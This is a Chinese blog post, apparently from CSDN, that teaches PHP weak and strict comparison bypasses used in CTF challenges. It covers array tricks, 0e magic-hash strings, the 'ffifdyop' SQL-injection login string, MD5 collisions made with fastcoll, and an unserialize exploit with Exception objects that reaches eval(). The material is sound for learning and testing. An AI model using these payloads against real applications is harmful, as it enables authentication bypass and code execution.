深入浅出PHP强弱比较

最新推荐文章于 2024-08-16 10:58:15 发布
最新推荐文章于 2024-08-16 10:58:15 发布
阅读量972 收藏 10
点赞数 22
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78871310/article/details/140933215
版权

鉴于最近打的一个比赛,来了解一下ctf中经常出现的弱等于强等于的问题

PHP弱类型

Q1:二者弱比教

这部分内容自己检索,简要的说==的情况下,左右两边的类型会进行转化。

举个例子来说

<?php
show_source(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
if($a != $b&& md5($a) == md5($b))
echo "you are right!";
else
echo "erro";
?>

如题,需要我们传入的内容不一样,但是MD5加密之后需要相同

常见的做法有两种

方法一:

弱比教数组绕过,payload如下

?a[]=1&b[]=2

先进行数组的比较,1!=2,再md5加密,对于对数组的加密,默认是Null,两者加密之后相同

方法二:

常见的知识积累

?a=240610708&b=s214587387a0

原理是两者MD5加密之后开头都是0e,在php语言中,0e会在php解释为0

以下是常见的一些

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a0

sha1的弱比教类比上面的内容

Q2:自身弱比教

例题如下

<?php
show_source(__FILE__);
$a=$_GET['a'];
if( md5($a) == $a)
echo "you are right!";
else
echo "erro";
?>

只需要md5加密之后等于自己就行

?a=0e215962017

做下记录就行

Q3:登入用户Md5(万能密码)

这个常见于登陆界面

可以参考这个文章,文章

ffifdyop 经过两次转化后得到的结果是 'or'6�]��!r,��b。位于 or 两侧的单引号可以用于闭合两端的单引号,使得 or 不再被 MySQL 认为是字符串,而是一个关键字,发挥着 逻辑或运算符 的作用。

Q4:Md5双层嵌套

md5(md5($a))==md5($a)

列举几个例子

CbDLytmyGm2xQyaLNhWn
770hQgrBOjrcqftrlaZk
7r4lGXCH2Ksu2JNT3BYM

可本地自己测试

PHP强类型

Q1:二者强比较

<?php
show_source(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
if($a != $b&& md5($a) === md5($b))
echo "you are right!";
else
echo "erro";
?>

也可以用数组进行绕过

?a[]=1&b[]=2

Q2:二者强比较(类限制)

当限制在类中无法利用数组,可以尝试md5碰撞,这里推荐工具fastcoll
在这里插入图片描述

然后工具执行

在这里插入图片描述

接下来写一个例题就行比较一下

<?php

$a=file_get_contents("C:\Users\30226\Desktop\ctftool\tools\fastcoll\1.txt");

$b=file_get_contents("C:\Users\30226\Desktop\ctftool\tools\fastcoll\2.txt");

$aa=urlencode($a);
$bb=urlencode($b);
if($aa===$bb)
echo("ok");
else
echo("erro");
echo "</br>";
$aaa=md5($a);
$bbb=md5($b);
if($aaa===$bbb)
echo("ok");
else
echo("erro");

在这里插入图片描述

Q3:MD5和sha1强比较

<?php
show_source(__FILE__);
class cianiao
{
    public $var1;
    public $var2;

    function __construct($var1, $var2)
    {
        $var1 = $var1;
        $var2 = $var2;
    }
    function __destruct()
    {
        echo md5($this->var1);
        echo md5($this->var2);
        if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) {
            eval($this->var1);
        }
    }
}
unserialize($_GET['payload']);

这里可以利用php的EXCEPTION异常类进行绕过,exp如下

<?php
class cianiao
{
    public $var1;
    public $var2;
} 

$cmd="phpinfo();?>";
$a = new Exception($cmd);
$b = new Exception($cmd,1);

$tr = new cianiao();
$tr->var1=$a;
$tr->var2=$b;

echo urlencode(serialize($tr));

输入可以进行绕过,原理是采用Exception类绕过md5sha1等哈希函数的强等于(===)检查,因为在特定情况下,PHP的类型转换机制会导致哈希碰撞被误解为相等。这种类型转换的特性可以通过抛出异常并捕获它们来实现。

ps:路径长度和包含的特殊字符(如中文字符)在序列化和反序列化过程中可能会出现编码问题,尤其是在不同环境中(如不同版本的 PHP,不同的操作系统)处理这些路径时,会导致路径解析错误或乱码,从而影响程序的正常执行。因此我的没有显示页面,但是也显示了字符串。

orange_www
关注
这个策略曾年赚5000万美元
绿杨
04-25 496
转 这个策略,曾年赚5000万美元 配对交易的起源 上世纪80年代初,摩根士丹利召集了一批计算机科学家和交易员,组成了一只神秘的独立团队,来研究股价差异带来的异常回报。团队成员包括哥伦比亚大学计算机系研究生Gerry Bamberger,量化交易员Nunzio Tartaglia,以及后来的德邵基金(D.E.Shaw & Co)创始人David Shaw。     &...
这个策略曾年赚00美
长亭路
04-25 395
转 这个策略,曾年赚5000万美元 配对交易的起源 上世纪80年代初,摩根士丹利召集了一批计算机科学家和交易员,组成了一只神秘的独立团队,来研究股价差异带来的异常回报。团队成员包括哥伦比亚大学计算机系研究生Gerry Bamberger,量化交易员Nunzio Tartaglia,以及后来的德邵基金(D.E.Shaw & Co)创始人David Shaw。     &...
PHP强相等&相等(附带科学计数法)
csjjjd的博客
12-14 1950
上述代码中,虽然 $str1 和 $str2 的值不相同,但是它们的 MD5 散列值都是 "b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9",因此输出结果为 "两个字符串的 MD5 散列值相等"。上述代码会输出结果 "相等",因为在进行类型比较时,字符串 "0x1e111" 会被转换为十六进制数 123457,与整数 123457 比较相等。比较(相等比较符==):比较只要求比较的两个值在转换类型后相等即可。
php中数据类型的严格比较 === 分析
fanyilong的专栏
10-07 999
php是若类型语言 , 字符串型数字跟
CTFPHP类型比较与MD5绕过详解
最新发布
star3119391396的博客
08-16 1284
PHP在判断是否相等时,有两种比较方式。1.=== 在进行比较时,会先判断两种字符串类型是否相等,再比较,这种就是强类型2.== 在进行比较时,会先将字符串类型转化成相同,在进行比较,这种就是类型。类型比较比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转化成相应数值再比较
CTF----PHP类型比较
qq_45671431的博客
04-11 3220
CTF学习打卡-----入门级小白篇三 ****开始我们今天的学习吧!!!! PHP php是一种类型语言,对数据的类型要求并不严格,可以让数据类型互相转换。 在php中有两种比较符号: 一种是 ==,另外一种是 ===,都是用来比较两个数值是否相等的操作符,但他们也是有区别的: <?php $a==$b; $a===$b; ?> == :等于。在比较前会先...
ctfphp 类型,CTFPHP代码审计小tips-类型==与===比较
weixin_42458217的博客
04-03 819
阅读次数MiniProject_PHP_Code_audit-3 Writeup整体逻辑:这段代码的逻辑是用户输入username和password两个参数,如果username和password的值不相等,再判断username和password字符串的 sha1 散列值与类型是否相等,如果相等才输出flag值。考点:这段代码中有一个逻辑点,怎么样使的两个值不相等,但是sha1()后的值相等。=...
CTFwp4-php类型比较
CTFwp笔记1-rsa基本知识+共模攻击
01-10 505
web- php类型比较1,php比较运算法2,题目 放假了,慢慢学吧,菜的离谱 1,php比较运算法 php中有两种比较运算符 ′==′'=='′==′和 ′===′'==='′===′, ′===′'==='′===′ 会同时比较字符串的值和类型, ′==′'=='′==′ 会先将字符串换成相同类型,再作比较,属于类型比较。 2,题目 攻防世界的web题目 题目中 a==0a==0a==0为相等,例如12==“12”–>true,而且12==“12cdf” --> true,只取
运维面试题
热门推荐
weixin_42690304的博客
09-18 2万+
运维面试题 NETWORK 1 请描述TCP/IP协议中主机与主机之间通信的三要素 参考答案 IP地址(IP address) 子网掩码(subnet mask) IP路由(IP router) 2 请描述IP地址的分类及每一类的范围 参考答案 A类1-26 B类128-191 C类192-223 D类224-239组播(多播) E类240-254科研 3 请描述A、B...
世界观安全
hacckjacking
08-06 666
「第二篇」客户端脚本安全 批注 [……] 表示他人、自己、网络批注 参考资料来源于 * 书中批注 * CSDN * GitHub * Google * 维基百科 * YouTube * MDN Web Docs ...
PHP】MD5比较漏洞 比较、强比较、强碰撞
EC_Carrot的博客
11-06 6780
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 细节可能还需参考一下师傅这篇文章: https://www.cnblogs.com/kuaile1314/p/11968108.html 比较 if($_POST['param1']!=$_POST['param2']&& md5($_POST['param1'])==md5($_POST['param2'])){ die("succ
84 CTF夺旗-PHP类型&异或取反&序列化&RCE
山兔的博客
02-15 1280
相关PHP所有总结知识点参考:ctf变量php类型比较问题php断言(assert) php读取目录下文件的方法preg_match绕过PHP中sha1() 函数和md5() 异或注入updatexml() 函数报错注入源文件泄露利用extract变量覆盖strcmp() 漏洞md5() 漏洞ereg() 截断漏洞类型整数大小比较绕过命令执行md5() 漏洞escapeshellarg() 与escapeshellcmd() sql注入绕过关键字。
CTF PHP代码审计 正则表达式 类型比较
baynk的博客
03-22 996
一进来就是PHP正则表达式 这个比较难的地方在于正则表达式里面的符号代表什么含义,网上去找了下资料。 在有了上面那个的基础后就比较容易了,分段来说明。 if ("POST" == $_SERVER['REQUEST_METHOD']) 需要用POST方式提交。 if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) { ...
CTF——web安全——php类型
qq_45215609的博客
05-15 1938
CTF——web安全 php类型 题目:备份是个好习惯
CTFWeb-PHP比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1828
文章目录前言PHP比较No.1 ACTF- PHP比较利用No.2 BJDCTF-MD5的/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP比较 进入正题之前,先介绍下 PHP 比较的相关知识,因为它经常出现在
CTF——PHP语言类型详解
nobugnomoney的博客
05-24 2964
一、 类型 第一次打CTF比赛,关于php语言类型这块了解的还不够,所以写一篇笔记学习一下。
php基于哈希算法出现的强弱比较漏洞
quan9i的博客
04-21 2929
php比较
PHP MD5 SHA1 比较 漏洞绕过
weixin_30872157的博客
09-05 2083
一,md5()无法处理数组,如果传入为数组则返回为NULL 二,利用==比较漏洞:   如果两个字符经MD5加密后为0exxxxx形式会被认为是科学计数法表示0*10的xxxx次方,值为零所以相等   以下例子MD5值是0e开头   QNKCDZO   240610708   s878926199a   s155964671a   s214587387a 补充:strc...
并发编程:深入理解数据的强弱一致性
"本文主要探讨了数据的一致性问题,特别是在并发编程中的共享变量一致性。在Java中,多线程操作共享变量可能导致数据不一致,这通常与Java内存模型和CPU缓存机制有关。文章通过一个例子展示了可能出现的并发问题,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值